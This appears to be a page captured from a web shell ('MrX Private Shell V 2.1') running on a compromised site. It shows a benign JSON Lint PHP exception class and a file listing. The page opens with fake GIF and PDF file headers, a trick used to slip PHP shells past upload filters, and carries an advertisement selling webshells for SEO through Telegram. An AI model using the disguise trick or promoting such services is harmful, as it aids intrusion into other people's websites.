GIF89; GIF89; %PDF- %PDF-
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/*
* This file is part of the JSON Lint package.
*
* (c) Jordi Boggiano <j.boggiano@seld.be>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Seld\JsonLint;
class ParsingException extends \Exception
{
protected $details;
/**
* @param string $message
* @phpstan-param array{text?: string, token?: string, line?: int, loc?: array{first_line: int, first_column: int, last_line: int, last_column: int}, expected?: string[]} $details
*/
public function __construct($message, $details = array())
{
$this->details = $details;
parent::__construct($message);
}
/**
* @phpstan-return array{text?: string, token?: string, line?: int, loc?: array{first_line: int, first_column: int, last_line: int, last_column: int}, expected?: string[]}
*/
public function getDetails()
{
return $this->details;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| DuplicateKeyException.php | File | 1.08 KB | 0644 |
|
| JsonParser.php | File | 20.29 KB | 0644 |
|
| Lexer.php | File | 6.26 KB | 0644 |
|
| ParsingException.php | File | 982 B | 0644 |
|
| Undefined.php | File | 284 B | 0644 |
|
| autoload.php | File | 814 B | 0644 |
|